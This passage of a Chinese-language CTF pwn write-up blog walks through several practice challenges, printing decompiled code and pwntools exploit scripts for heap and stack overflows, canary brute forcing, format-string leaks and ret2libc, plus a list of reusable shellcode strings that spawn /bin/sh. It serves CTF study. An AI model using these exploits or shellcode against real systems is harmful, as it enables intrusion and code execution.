8db3\u540e\uff0c32\u4f4d\u4f1a\u52a04\u5b57\u8282\u7684\u5934<\/p>\n\n\n\n<p>\u4ee5\u6b64\u7c7b\u63a8\uff0c64\u4f4d\u4f1a\u52a08\u5b57\u8282\uff08\uff09<\/p>\n\n\n\n<p>\u597d\uff0c\u8a00\u5f52\u6b63\u4f20\u56de\u5230\u9898\u76ee<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>int __cdecl main(int argc, const char **argv, const char **envp)<br>{<br> &nbsp;char *command; \/\/ &#91;esp+8h] &#91;ebp-10h]<br> &nbsp;char *s; \/\/ &#91;esp+Ch] &#91;ebp-Ch]<br>\u200b<br> &nbsp;setbuf(stdin, 0);<br> &nbsp;setbuf(stdout, 0);<br> &nbsp;s = (char *)malloc(0x16u);<br> &nbsp;command = (char *)malloc(0x16u);<br> &nbsp;puts(\"Input:\");<br> &nbsp;gets(s);<br> &nbsp;system(command);<br> &nbsp;return 0;<br>}<\/code><\/pre>\n\n\n\n<p>\u662f\u5427\uff0c\u5b9a\u4e49\u4fe9\u6307\u9488\uff0c\u7136\u540emalloc\u8fd9\u6837\u4e24\u5757<\/p>\n\n\n\n<p>0x16 = 22<\/p>\n\n\n\n<p>\u4e0d\u591f\uff0c\u586b\u7a7a\u5b57\u8282\u8fdb\u53bb<\/p>\n\n\n\n<p>\u8fd9\u4e2a\u65f6\u5019gdb\u8c03\u8bd5\u7684\u7ed3\u679c\u957f\u8fd9\u6837\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image 
size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-6.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"770\" height=\"344\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-6.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-660\"  sizes=\"auto, (max-width: 770px) 100vw, 770px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u91cc\u662f\u53ea\u8fdb\u884c\u4e86\u7b2c\u4e00\u6b21malloc\u7684\u6548\u679c\uff0c\u53ef\u4ee5\u770b\u5230\uff0c\u660e\u660e\u53ea\u8981\u4e860x16 = 22<\/p>\n\n\n\n<p>\u5b9e\u9645\u4e0a\u7ed9\u4e86\u4ece0x804b1a0\u52300x804b1bc\u7684\u957f\u5ea6<\/p>\n\n\n\n<p>\u4e5f\u5c31\u662f28\u5b57\u8282\uff08\u7c89\u8272\u5185\u5bb9\uff09<\/p>\n\n\n\n<p>\u7b49\u5230\u7b2c\u4e8c\u6b21malloc\u5b8c\u6210\uff0c\u60c5\u51b5\u4e5f\u662f\u7c7b\u4f3c<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-7.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"878\" height=\"315\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-7.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-661\"  sizes=\"auto, (max-width: 878px) 100vw, 878px\" \/><\/div><\/figure>\n\n\n\n<p>\u597d\u4e86\uff0c\u7b2c\u4e8c\u6b21malloc\u7684\u5185\u5bb9\u4e0d\u5c31\u662f\u6211\u4eec\u8981\u7684command\u561b<\/p>\n\n\n\n<p>\u5b83\u8f93\u5165\u6ca1\u6709\u9a8c\u8bc1\u8f93\u5165\u957f\u5ea6<\/p>\n\n\n\n<p>\u6240\u4ee5\uff0c\u5806\u6ea2\u51fa\u4e0d\u5c31\u6765\u4e86\u561b<\/p>\n\n\n\n<p>\u5148\u519928\u5b57\u8282\u5783\u573e\u6570\u636e<\/p>\n\n\n\n<p>\u7136\u540e\uff0c\u90a3\u4e2a0x21\u662f\u5e72\u561b\u7684\u5462\uff0c\u5c31\u662f\u6807\u957f\u5ea6\u7684\uff0c\u8981\u662f\u60f3\u4fdd\u7559\u4e00\u70b9\u539f\u6c41\u539f\u5473\uff0c\u586b\u5b8c\u5783\u573e\u6570\u636e\u518dp32(0x21)\u5c31\u597d\u4e86<\/p>\n\n\n\n<p>\u53cd\u6b63\u5b83\u53ea\u662f\u6807\u6ce8\uff0c\u4e0d\u5f71\u54cd\u5b9e\u9645\u7684\u5185\u5b58\u533a\u57df\u5206\u914d\uff0c\u522b\u628a\u6211\u4eec\u60f3\u5199\u7684\/bin\/sh\u5199\u5230\u90a3\u91cc\u53bb\u5c31\u884c\u4e86<\/p>\n\n\n\n<p>\u6240\u4ee5\u76f8\u5f53\u4e8e\u4f60\u586b28+4 \u7684\u5783\u573e\u6570\u636e\u8fdb\u53bb\u90fd\u6ca1\u4e8b\uff0c\u53cd\u6b63\u90fd\u4e00\u6837<\/p>\n\n\n\n<p>\u5b8c\u4e86\u76f4\u63a5system(&#8220;\/bin\/sh&#8221;);<\/p>\n\n\n\n<p>\u6ca1\u4e86\uff0cget shell<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">[NISACTF 2022]shop_pwn<\/h2>\n\n\n\n<p>\u597d\u4e1c\u897f\uff0c\u53c8\u662f\u6761\u4ef6\u7ade\u4e89\uff0c\u8fd9\u9898\u5f53\u6761\u4ef6\u7ade\u4e89\u5165\u95e8\u9898\u611f\u89c9\u633a\u4e0d\u9519\u7684<\/p>\n\n\n\n<p>main\u6307\u5411game()<\/p>\n\n\n\n<p>game()\u6ca1\u4ec0\u4e48\u597d\u8bf4\u7684<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>void __noreturn game()<br>{<br> &nbsp;int v0; \/\/ eax<br> &nbsp;int i; \/\/ &#91;rsp+Ch] &#91;rbp-4h]<br>\u200b<br> &nbsp;while ( 1 )<br>  {<br> &nbsp; &nbsp;while ( 1 )<br> 
&nbsp;  {<br> &nbsp; &nbsp; &nbsp;puts(\" &nbsp; &nbsp; Welcome to my shop &nbsp; &nbsp; \");<br> &nbsp; &nbsp; &nbsp;puts(\"+===========================+\");<br> &nbsp; &nbsp; &nbsp;puts(\"| No| &nbsp; &nbsp; &nbsp;  | Sell| Recycle|\");<br> &nbsp; &nbsp; &nbsp;puts(\"+===+========+=====+========+\");<br> &nbsp; &nbsp; &nbsp;for ( i = 0; i &lt;= 15; ++i )<br> &nbsp; &nbsp;  {<br> &nbsp; &nbsp; &nbsp; &nbsp;if ( *(_DWORD *)&amp;gd&#91;24 * i + 16] )<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;printf(<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\"| %d | %-4s &nbsp; | %3d | &nbsp; %3d  |\\n\",<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;i,<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&amp;gd&#91;24 * i],<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;*(_DWORD *)&amp;gd&#91;24 * i + 16],<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;*(_DWORD *)&amp;gd&#91;24 * i + 20]);<br> &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp;puts(\"+===========================+\");<br> &nbsp; &nbsp; &nbsp;puts(\"1. look bags\\n2. buy goods\\n3. 
sale goods\");<br> &nbsp; &nbsp; &nbsp;printf(\"&gt; \");<br> &nbsp; &nbsp; &nbsp;v0 = read_int();<br> &nbsp; &nbsp; &nbsp;if ( v0 != 2 )<br> &nbsp; &nbsp; &nbsp; &nbsp;break;<br> &nbsp; &nbsp; &nbsp;buy();<br> &nbsp;  }<br> &nbsp; &nbsp;if ( v0 &gt; 2 )<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;if ( v0 == 3 )<br> &nbsp; &nbsp;  {<br> &nbsp; &nbsp; &nbsp; &nbsp;sale();<br> &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp;else<br> &nbsp; &nbsp;  {<br> &nbsp; &nbsp; &nbsp; &nbsp;if ( v0 == 4 )<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;exit(0);<br>LABEL_17:<br> &nbsp; &nbsp; &nbsp; &nbsp;puts(\"Invalid!\");<br> &nbsp; &nbsp;  }<br> &nbsp;  }<br> &nbsp; &nbsp;else<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;if ( v0 != 1 )<br> &nbsp; &nbsp; &nbsp; &nbsp;goto LABEL_17;<br> &nbsp; &nbsp; &nbsp;look();<br> &nbsp;  }<br>  }<br>}<\/code><\/pre>\n\n\n\n<p>\u5e38\u89c4\u4e70\u5356\u4ea4\u6613<\/p>\n\n\n\n<p>\u4e70\u4e5f\u4f1a\u521b\u5efa\u65b0\u7684\u7ebf\u7a0b\u8ba9\u65b0\u7ebf\u7a0b\u8fd0\u884cto_buy\u51fd\u6570<\/p>\n\n\n\n<p>\u4f46\u662fto_buy\u51fd\u6570\u6ca1\u6709\u5ef6\u65f6\uff0c\u6761\u4ef6\u7ade\u4e89\u6253\u4e0d\u4e86<\/p>\n\n\n\n<p>\u4f46\u662f\u5356\u53ef\u4ee5<\/p>\n\n\n\n<p>\u90a3\u4e48\u76ee\u6807\u5c31\u662f\u53cd\u590d\u5356\u51fa\u8d5a\u7c73<\/p>\n\n\n\n<p>\u6b38\uff0c\u90a3\u6211\u4eec\u600e\u4e48\u53cd\u590d\u5356\u5462<\/p>\n\n\n\n<p>\u51481\u770b\u770b<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-8.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"875\" height=\"565\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-8.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-662\"  sizes=\"auto, (max-width: 875px) 100vw, 875px\" \/><\/div><\/figure>\n\n\n\n<p>\u5f00\u5c40\u4e00\u652f\u7b14\uff0c\u90a3\u6709\u529e\u6cd5\u4e86<\/p>\n\n\n\n<p>\u76f4\u63a5\u5f00\u5356\uff0c\u5c31\u5229\u7528to_Sale\u5b58\u5728\u7684\u5ef6\u65f6\uff0c\u5728\u90a3\u6bb5\u65f6\u95f4\u91cc\u75af\u72c2\u7684\u5356\u51fapen<\/p>\n\n\n\n<p>\u5356\u5b8c\u94b1\u5c31\u591f\u4e70flag\u4e86<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context(arch='amd64', os='linux', log_level='debug')<br>\u200b<br>io = remote('node5.anna.nssctf.cn', 23623)<br># io = process('.\/&#91;NISACTF 2022]shop_pwn')<br>\u200b<br>\u200b<br>\u200b<br>io.sendline(b'3')<br>io.sendline(b'0')<br>io.sendline(b'3')<br>io.sendline(b'0')<br>io.sendline(b'3')<br>io.sendline(b'0')<br>io.sendline(b'3')<br>io.sendline(b'0')<br>io.sendline(b'3')<br>io.sendline(b'0')<br>io.sendline(b'2')<br>io.sendline(b'1')<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[CISCN 2023 \u521d\u8d5b]funcanary<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)<br>{<br> &nbsp;__pid_t v3; \/\/ &#91;rsp+Ch] &#91;rbp-4h]<br>\u200b<br> &nbsp;sub_1243();<br> &nbsp;while ( 1 )<br>  {<br> &nbsp; &nbsp;v3 = fork();<br> &nbsp; &nbsp;if ( v3 &lt; 0 )<br> &nbsp; &nbsp; &nbsp;break;<br> &nbsp; &nbsp;if ( v3 )<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;wait(0LL);<br> &nbsp;  }<br> &nbsp; &nbsp;else<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;puts(\"welcome\");<br> &nbsp; &nbsp; &nbsp;sub_128A();<br> &nbsp; &nbsp; &nbsp;puts(\"have fun\");<br> &nbsp;  }<br>  }<br> &nbsp;puts(\"fork error\");<br> 
&nbsp;exit(0);<br>}<\/code><\/pre>\n\n\n\n<p>fork\u51fd\u6570<\/p>\n\n\n\n<p>\u5408\u7406\u4e86<\/p>\n\n\n\n<p>canary\u4e3a\u6807\u9898\uff0c\u8fd9\u91cc\u731c\u90fd\u77e5\u9053\u662f\u8981\u9760\u7206\u7834\u4e86<\/p>\n\n\n\n<p>\u7206\u7834\u7684\u601d\u8def\u4ecd\u7136\u662f\u8001\u4e00\u5957<\/p>\n\n\n\n<p>\uff08\u53ef\u4ee5\u53c2\u8003pwn119\uff09<\/p>\n\n\n\n<p>\u5148\u4e0d\u6025\uff0c\u7ee7\u7eed\u5f80\u4e0b\u770b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>unsigned __int64 sub_128A()<br>{<br> &nbsp;_BYTE buf&#91;104]; \/\/ &#91;rsp+0h] &#91;rbp-70h] BYREF<br> &nbsp;unsigned __int64 v2; \/\/ &#91;rsp+68h] &#91;rbp-8h]<br>\u200b<br> &nbsp;v2 = __readfsqword(0x28u);<br> &nbsp;read(0, buf, 0x80uLL);<br> &nbsp;return v2 - __readfsqword(0x28u);<br>}<\/code><\/pre>\n\n\n\n<p>\u6ea2\u51fa\u70b9\u627e\u5230<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>io = process(\".\/service\")<br>\u200b<br>'\u63a5\u53d7\u6742\u8d28\u6d88\u606f'<br>io.recvuntil(b'welcome\\n')<br>\u200b<br>\u200b<br>canary = b'\\x00'<br>for k in range(7):<br>    for i in range(256):<br>        io.send(b'a'*(0x70-8) + canary + p8(i))<br>        response = io.recvuntil('welcome\\n')<br>        if b'fun' in response:<br>            canary += p8(i)<br>            print(b'canary: ',canary)<br>            break<br>            <br>            <br>cat = 0x0231<br>\u200b<br>while(1):<br>    for i in range(16):<br>        payload = b'a'*(0x70-8) + canary + b'a'*(8) + p16(cat)<br>        io.send(payload)<br>        response = io.recvuntil(\"welcome\\n\")<br>        print(response)<br>        if b'welcome' in response:<br>            cat += 0x1000<br>            continue<br>        if b'{' in response:<br>            print(response)<br>            
break<br>\u200b<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<p>\u8f6e\u7740\u89e3\u91ca\u4e00\u4e0bexp<\/p>\n\n\n\n<p>\u7b2c\u4e00\u6b65\u7684\u4e24\u4e2a\u5d4c\u5957for\u5faa\u73af\u5c31\u662f\u4e3a\u4e86\u7206canary<\/p>\n\n\n\n<p>\u56e0\u4e3a\u4fdd\u62a4\u5168\u5f00\u7684\u539f\u56e0\uff0c\u5b58\u5728pie<\/p>\n\n\n\n<p>\u6240\u4ee5\u6211\u4eec\u770b\u5230\u7684cat flag\u8fd9\u4e2a\u6307\u4ee4\u7684\u4f4d\u7f6e\u4e5f\u662f\u4e0d\u786e\u5b9a\u7684<\/p>\n\n\n\n<p>\u4f46\u662f\u5185\u5b58\u5206\u9875\u673a\u5236\u5c31\u6548\u679c\u5c31\u662f\u80fd\u8ba9\u6211\u4eec\u901a\u8fc7\u7206\u7834\u5f3a\u89e3<\/p>\n\n\n\n<p>\u8fd9\u5c31\u5b8c\u4e8b\u4e86<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">[HUBUCTF 2022 \u65b0\u751f\u8d5b]fmt<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>int __fastcall __noreturn main(int argc, const char **argv, const char **envp)<br>{<br> &nbsp;FILE *stream; \/\/ &#91;rsp+8h] &#91;rbp-68h]<br> &nbsp;char format&#91;32]; \/\/ &#91;rsp+10h] &#91;rbp-60h] BYREF<br> &nbsp;char s&#91;8]; \/\/ &#91;rsp+30h] &#91;rbp-40h] BYREF<br> &nbsp;__int64 v6; \/\/ &#91;rsp+38h] &#91;rbp-38h]<br> &nbsp;__int64 v7; \/\/ &#91;rsp+40h] &#91;rbp-30h]<br> &nbsp;__int64 v8; \/\/ &#91;rsp+48h] &#91;rbp-28h]<br> &nbsp;__int64 v9; \/\/ &#91;rsp+50h] &#91;rbp-20h]<br> &nbsp;__int64 v10; \/\/ &#91;rsp+58h] &#91;rbp-18h]<br> &nbsp;__int16 v11; \/\/ &#91;rsp+60h] &#91;rbp-10h]<br> &nbsp;unsigned __int64 v12; \/\/ &#91;rsp+68h] &#91;rbp-8h]<br>\u200b<br> &nbsp;v12 = __readfsqword(0x28u);<br> &nbsp;setvbuf(stdin, 0LL, 2, 0LL);<br> &nbsp;setvbuf(stdout, 0LL, 2, 0LL);<br> &nbsp;setvbuf(stderr, 0LL, 2, 0LL);<br> &nbsp;stream = fopen(\"flag.txt\", \"r\");<br> &nbsp;*(_QWORD *)s = 0LL;<br> &nbsp;v6 = 0LL;<br> &nbsp;v7 = 0LL;<br> &nbsp;v8 = 0LL;<br> &nbsp;v9 = 0LL;<br> &nbsp;v10 = 0LL;<br> &nbsp;v11 = 0;<br> &nbsp;if ( stream )<br> &nbsp; &nbsp;fgets(s, 50, stream);<br> &nbsp;HIBYTE(v11) = 0;<br> &nbsp;while ( 1 )<br>  {<br> &nbsp; &nbsp;puts(\"Echo as a service\");<br> &nbsp; 
&nbsp;gets(format);<br> &nbsp; &nbsp;printf(format);<br> &nbsp; &nbsp;putchar(10);<br>  }<br>}<\/code><\/pre>\n\n\n\n<p>GDB\u8c03\u8bd5\u8fd0\u884c\u5230\u8fd9\u4e2a\u4f4d\u7f6e<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-9-1024x502.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"502\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-9-1024x502.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-663\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u6b38\uff0c\u76f4\u63a5\u504f\u79fb\u5c31\u80fd\u627e\u5230\u4e86\u561b<\/p>\n\n\n\n<p>\u8fd9\u91ccgets\u5b58\u8fdb\u7684\u662fformat<\/p>\n\n\n\n<p>\u800cformat\u662f32\u5b57\u8282<\/p>\n\n\n\n<p>\u6240\u4ee5\u8fd9\u91cc\u7684\u957f\u5ea6\u5c31\u662f<\/p>\n\n\n\n<p>0x40 \/ 8 + 32\/8 = 8 + 4 = 12<\/p>\n\n\n\n<p>\u4f46\u662f\uff0c\u53bb\u5b9e\u9645\u5c1d\u8bd5\u53d1\u73b012\u5e76\u4e0d\u884c\uff0c\u5b9e\u9645\u4e0a\u5e94\u8be5\u5f80\u540e\u632a\u4e00\u4f4d\u624d\u662f\u771f\u6b63\u7684\u504f\u79fb\u503c<\/p>\n\n\n\n<p>\u4f46\u662f\u53c8\u6709\u95ee\u9898\uff0c\u5b83\u8f93\u51fa\u7684\u503c\u662f16\u8fdb\u5236\u7684\uff0c\u6240\u4ee5\u8fd8\u5f97\u518d\u8f6c\u4e00\u6b21ascll<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-10.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"858\" height=\"899\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-10.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-664\"  sizes=\"auto, (max-width: 858px) 100vw, 858px\" \/><\/div><\/figure>\n\n\n\n<p>\u8f6c\u8f6c\u5c31\u597d\u4e86\uff08\uff09<\/p>\n\n\n\n<p>\u6ce8\u610f\u6362\u6210\u5c0f\u7aef\u5e8f<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">[HNCTF 2022 Week1]safe_shellcode<\/h2>\n\n\n\n<p>\u6ca1\u5565\u597d\u8bf4\u7684<\/p>\n\n\n\n<p>\u4f46\u662f\u8bb0\u5f55\u4e00\u4e0b\u8fd9\u4e2a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># 32\u4f4d \u77ed\u5b57\u8282shellcode --&gt; 21\u5b57\u8282<br>\\x6a\\x0b\\x58\\x99\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x31\\xc9\\xcd\\x80<br>\u200b<br># 32\u4f4d \u7eafascii\u5b57\u7b26shellcode<br>PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJISZTK1HMIQBSVCX6MU3K9M7CXVOSC3XS0BHVOBBE9RNLIJC62ZH5X5PS0C0FOE22I2NFOSCRHEP0WQCK9KQ8MK0AA<br>\u200b<br># 32\u4f4d scanf\u53ef\u8bfb\u53d6\u7684shellcode<br>\\xeb\\x1b\\x5e\\x89\\xf3\\x89\\xf7\\x83\\xc7\\x07\\x29\\xc0\\xaa\\x89\\xf9\\x89\\xf0\\xab\\x89\\xfa\\x29\\xc0\\xab\\xb0\\x08\\x04\\x03\\xcd\\x80\\xe8\\xe0\\xff\\xff\\xff\/bin\/sh<br>\u200b<br># 64\u4f4d scanf\u53ef\u8bfb\u53d6\u7684shellcode 22\u5b57\u8282<br>\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x57\\x54\\x5f\\xb0\\x3b\\x99\\x0f\\x05<br>\u200b<br># 64\u4f4d \u8f83\u77ed\u7684shellcode  
23\u5b57\u8282<br>\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x99\\x0f\\x05<br>\u200b<br># 64\u4f4d \u7eafascii\u5b57\u7b26shellcode<br>Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t<br>\u200b<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[HNCTF 2022 Week1]ezcmp<\/h2>\n\n\n\n<p>x\/10gx *0x404100<\/p>\n\n\n\n<p>p64\u5206\u6bb5\u4f20\u5165<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">[SWPUCTF 2022 \u65b0\u751f\u8d5b]Integer Overflow<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>#io = process(\".\/pwn\")<br>io = remote(\"node5.anna.nssctf.cn\",21127)<br>\u200b<br>io.sendline(b'1')<br>io.sendline(b'-1')<br>\u200b<br>offset = 0x20 + 4<br>bin_sh = 0x804A008<br>system = 0x80494FB<br>ret = 0x0804900e<br>\u200b<br>\u200b<br>pd = b'a' * offset <br>pd += p32(system)<br>pd += p32(bin_sh)<br>\u200b<br>\u200b<br># gdb.attach(io)<br>\u200b<br>io.sendline(pd)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[\u6df1\u80b2\u676f 2021]find_flag<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.log_level = 'debug'<br>io = remote(\"node4.anna.nssctf.cn\",28334)<br># io = process(\".\/find_flag\")<br>\u200b<br>\u200b<br>io.sendlineafter(b'name?', b'%17$p.%19$p')<br>io.recvuntil(b'you, ')<br>leak = io.recvuntil(b'!')&#91;0:-1] <br>\u200b<br>\u200b<br>leak_str = leak.decode()<br>canary_str, stack_str = leak_str.split('.') &nbsp;<br>canary = int(canary_str, 16) &nbsp;<br>stack_addr = int(stack_str, 16) &nbsp;<br>\u200b<br>\u200b<br>success(f\"canary: {hex(canary)}\")<br>success(f\"stack_addr: {hex(stack_addr)}\")<br>\u200b<br>\u200b<br>base_addr = stack_addr - 0x146F<br>flag_addr = base_addr + 0x1231<br>success(f\"flag_addr: {hex(flag_addr)}\")<br>\u200b<br>\u200b<br>pd = b'a'*(0x40 - 0x8) + p64(canary) + p64(0) + 
p64(flag_addr)<br>\u200b<br>io.sendline(pd)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u6709\u624b\u5c31\u884c\u7684\u6808\u6ea2\u51fa<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>io = remote(\"node5.anna.nssctf.cn\",29100)<br>\u200b<br>\u200b<br>ret = 0x000000000040101a<br>backd = 0x0000000000401257<br>\u200b<br>payload = b'a'*(32+8) + p64(ret) +p64(backd)<br>\u200b<br>io.sendline(payload)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[BJDCTF 2020]babyrop<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>\u200b<br>\u200b<br>io = remote('node4.anna.nssctf.cn',28199)<br># io=process(\".\/pwn\")<br>elf = ELF('.\/pwn')<br>libc= ELF(elf.libc.path)<br>\u200b<br>ret_add =0x00000000004004c9<br>pop_rdi =0x0000000000400733<br>main_add =0x0000000004006AD<br>puts_got = elf.got&#91;'puts']<br>puts_plt = elf.plt&#91;'puts']<br>\u200b<br>print(\"Puts_got: \",hex(puts_got))<br>print(\"Puts_plt: \",hex(puts_plt))<br>\u200b<br>offset=0x20<br>\u200b<br>payload1 = b'a' * (offset+8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_add)<br>io.sendlineafter(b'story!', payload1)<br>puts_addr = u64(io.recvuntil(b'\\x7f')&#91;-6:].ljust(8,b'\\x00'))<br>print(\"Puts_addr: \",hex(puts_addr))<br>\u200b<br>\u200b<br>\u200b<br>libc_base = puts_addr -     0x4ef50<br>system_add = libc_base +    0x24c50<br>bin_sh_add = libc_base + 0x16c617<br>\u200b<br>payload2 = b'a' * (offset+8) + 